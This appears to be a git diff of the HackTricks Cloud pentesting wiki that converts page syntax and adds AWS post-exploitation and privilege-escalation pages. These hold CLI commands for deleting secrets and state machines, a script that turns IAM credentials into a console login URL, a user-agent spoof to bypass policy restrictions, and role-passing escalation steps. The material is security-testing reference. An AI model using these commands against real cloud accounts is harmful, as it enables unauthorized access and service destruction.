- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 For more information check: -{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %} -[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-s3-athena-and-glacier-enum.md +{{#endref}} ### Sensitive Information @@ -48,17 +35,4 @@ Finally, the attacker could upload a final file, usually named "ransom-note.txt, **For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.** -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md new file mode 100644 index 000000000..7560dd6c5 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md @@ -0,0 +1,49 @@ +# AWS - Secrets Manager Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Secrets Manager + +For more information check: + +{{#ref}} +../aws-services/aws-secrets-manager-enum.md +{{#endref}} + +### Read Secrets + +The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. + +### DoS Change Secret Value + +Changing the value of the secret you could **DoS all the system that depends on that value.** + +> [!WARNING] +> Note that previous values are also stored, so it's easy to just go back to the previous value. + +```bash +# Requires permission secretsmanager:PutSecretValue +aws secretsmanager put-secret-value \ + --secret-id MyTestSecret \ + --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" +``` + +### DoS Change KMS key + +```bash +aws secretsmanager update-secret \ + --secret-id MyTestSecret \ + --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE +``` + +### DoS Deleting Secret + +The minimum number of days to delete a secret are 7 + +```bash +aws secretsmanager delete-secret \ + --secret-id MyTestSecret \ + --recovery-window-in-days 7 +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md new file mode 100644 index 000000000..157ea2e24 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md @@ -0,0 +1,83 @@ +# AWS - SES Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## SES + +For more information check: + +{{#ref}} +../aws-services/aws-ses-enum.md +{{#endref}} + +### `ses:SendEmail` + +Send an email. + +```bash +aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json +aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json +``` + +Still to test. + +### `ses:SendRawEmail` + +Send an email. + +```bash +aws ses send-raw-email --raw-message file://message.json +``` + +Still to test. + +### `ses:SendTemplatedEmail` + +Send an email based on a template. + +```bash +aws ses send-templated-email --source --destination --template +``` + +Still to test. + +### `ses:SendBulkTemplatedEmail` + +Send an email to multiple destinations + +```bash +aws ses send-bulk-templated-email --source --template +``` + +Still to test. + +### `ses:SendBulkEmail` + +Send an email to multiple destinations. + +``` +aws sesv2 send-bulk-email --default-content --bulk-email-entries +``` + +### `ses:SendBounce` + +Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. + +```bash +aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list +``` + +Still to test. + +### `ses:SendCustomVerificationEmail` + +This will send a customized verification email. You might need permissions also to created the template email. + +```bash +aws ses send-custom-verification-email --email-address --template-name +aws sesv2 send-custom-verification-email --email-address --template-name +``` + +Still to test. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md similarity index 52% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md index 7492acfd1..39017f43d 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - SNS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SNS For more information: -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-sns-enum.md +{{#endref}} ### Disrupt Messages @@ -51,11 +38,9 @@ aws sns publish --topic-arn --message An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability. -{% code overflow="wrap" %} ```bash aws sns set-topic-attributes --topic-arn --attribute-name --attribute-value ``` -{% endcode %} **Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. @@ -63,12 +48,10 @@ aws sns set-topic-attributes --topic-arn --attribute-name --attr An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. -{% code overflow="wrap" %} ```bash aws sns subscribe --topic-arn --protocol --endpoint aws sns unsubscribe --subscription-arn ``` -{% endcode %} **Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic. @@ -87,26 +70,11 @@ aws sns remove-permission --topic-arn --label An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. -{% code overflow="wrap" %} ```bash aws sns tag-resource --resource-arn --tags Key=,Value= aws sns untag-resource --resource-arn --tag-keys ``` -{% endcode %} **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md similarity index 55% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md index 09584ee40..ad1073251 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - SQS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SQS For more information check: -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-sqs-and-sns-enum.md +{{#endref}} ### `sqs:SendMessage` , `sqs:SendMessageBatch` @@ -97,17 +84,4 @@ arduinoCopy codeaws sqs remove-permission --queue-url --label **Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md new file mode 100644 index 000000000..1b02581d6 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md @@ -0,0 +1,25 @@ +# AWS - SSO & identitystore Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## SSO & identitystore + +For more information check: + +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} + +### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` + +These permissions can be used to disrupt permissions: + +```bash +aws sso-admin delete-permission-set --instance-arn --permission-set-arn + +aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --permission-set-arn --permissions-boundary-policy-arn + +aws sso-admin delete-account-assignment --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md new file mode 100644 index 000000000..4a26196b2 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -0,0 +1,74 @@ +# AWS - Step Functions Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Step Functions + +For more information about this AWS service, check: + +{{#ref}} +../aws-services/aws-stepfunctions-enum.md +{{#endref}} + +### `states:RevealSecrets` + +This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. + +
+ +### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` + +An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. + +> [!NOTE] +> +> - Deleting a state machine you also delete all its associated versions and aliases. +> - Deleting a state machine alias you do not delete the state machine versions referecing this alias. +> - It is not possible to delete a state machine version currently referenced by one o more aliases. + +```bash +# Delete state machine +aws stepfunctions delete-state-machine --state-machine-arn +# Delete state machine version +aws stepfunctions delete-state-machine-version --state-machine-version-arn +# Delete state machine alias +aws stepfunctions delete-state-machine-alias --state-machine-alias-arn +``` + +- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. + +### `states:UpdateMapRun` + +An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. + +```bash +aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] +``` + +- **Potential Impact**: Performance degradation, and disruption of critical workflows. + +### `states:StopExecution` + +An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. + +> [!WARNING] +> This action is not supported by **express state machines**. + +```bash +aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] +``` + +- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. + +### `states:TagResource`, `states:UntagResource` + +An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. + +```bash +aws stepfunctions tag-resource --resource-arn --tags Key=,Value= +aws stepfunctions untag-resource --resource-arn --tag-keys +``` + +**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md similarity index 54% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md index 7a03ece8e..c1023dc7b 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - STS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## STS For more information: -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} ### From IAM Creds to Console @@ -32,7 +19,6 @@ Note that the the user/role must have the permission **`sts:GetFederationToken`* The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console: -{% code overflow="wrap" %} ```bash # Get federated creds (you must indicate a policy or they won't have any perms) ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges @@ -69,11 +55,10 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) # Give the URL to login echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token" ``` -{% endcode %} -#### aws\_consoler +#### aws_consoler -You can **generate a web console link** with [https://github.com/NetSPI/aws\_consoler](https://github.com/NetSPI/aws_consoler). +You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler). ```bash cd /tmp @@ -83,9 +68,8 @@ pip install aws-consoler aws_consoler [params...] #This will generate a link to login into the console ``` -{% hint style="warning" %} -Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. -{% endhint %} +> [!WARNING] +> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. #### aws-vault @@ -97,15 +81,13 @@ aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds aws-vault login jonsmith # Open a browser logged as jonsmith ``` -{% hint style="info" %} -You can also use **aws-vault** to obtain an **browser console session** -{% endhint %} +> [!NOTE] +> You can also use **aws-vault** to obtain an **browser console session** ### **Bypass User-Agent restrictions from Python** If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing: -{% code overflow="wrap" %} ```bash # Shared by ex16x41 # Create a client @@ -118,19 +100,5 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda # Perform the action response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md new file mode 100644 index 000000000..d39f99060 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md @@ -0,0 +1,13 @@ +# AWS - VPN Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## VPN + +For more information: + +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md new file mode 100644 index 000000000..f795302bc --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md @@ -0,0 +1,23 @@ +# AWS - Privilege Escalation + +{{#include ../../../banners/hacktricks-training.md}} + +## AWS Privilege Escalation + +The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. + +> [!WARNING] +> AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. + +> [!CAUTION] +> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ +> So remember that this is another way to **grant privileged permissions** to a principal. + +**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** + +## Tools + +- [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) +- [Pacu](https://github.com/RhinoSecurityLabs/pacu) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md similarity index 59% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md index fb13f3276..297789085 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md @@ -1,27 +1,14 @@ # AWS - Apigateway Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Apigateway For more information check: -{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} -[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-api-gateway-enum.md +{{#endref}} ### `apigateway:POST` @@ -48,25 +35,21 @@ aws --region apigateway get-api-key --api-key --include-value With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda). -{% code overflow="wrap" %} ```bash aws apigateway update-rest-api \ --rest-api-id api-id \ --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' ``` -{% endcode %} **Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info. ### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole` -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" @@ -80,19 +63,16 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Access to resources associated with the Lambda function's IAM role. ### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment` -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" AUTHORIZER_ID="your-authorizer-id" @@ -104,15 +84,13 @@ aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZ # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Bypassing security checks, unauthorized access to API resources. ### `apigateway:UpdateVpcLink` -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**. @@ -126,17 +104,4 @@ aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op= **Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md new file mode 100644 index 000000000..f4e2282e8 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md @@ -0,0 +1,9 @@ +# AWS - Chime Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +### chime:CreateApiKey + +TODO + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md similarity index 59% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md index f81096943..d205cf1ad 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md @@ -1,27 +1,14 @@ # AWS - Cloudformation Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## cloudformation For more information about cloudformation check: -{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %} -[aws-cloudformation-and-codestar-enum.md](../../aws-services/aws-cloudformation-and-codestar-enum.md) -{% endcontent-ref %} +{{#ref}} +../../aws-services/aws-cloudformation-and-codestar-enum.md +{{#endref}} ### `iam:PassRole`, `cloudformation:CreateStack` @@ -35,9 +22,9 @@ aws cloudformation create-stack --stack-name \ In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**: -{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %} -[iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md](iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) -{% endcontent-ref %} +{{#ref}} +iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +{{#endref}} **Potential Impact:** Privesc to the cloudformation service role specified. @@ -51,7 +38,7 @@ aws cloudformation update-stack \ --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ --role 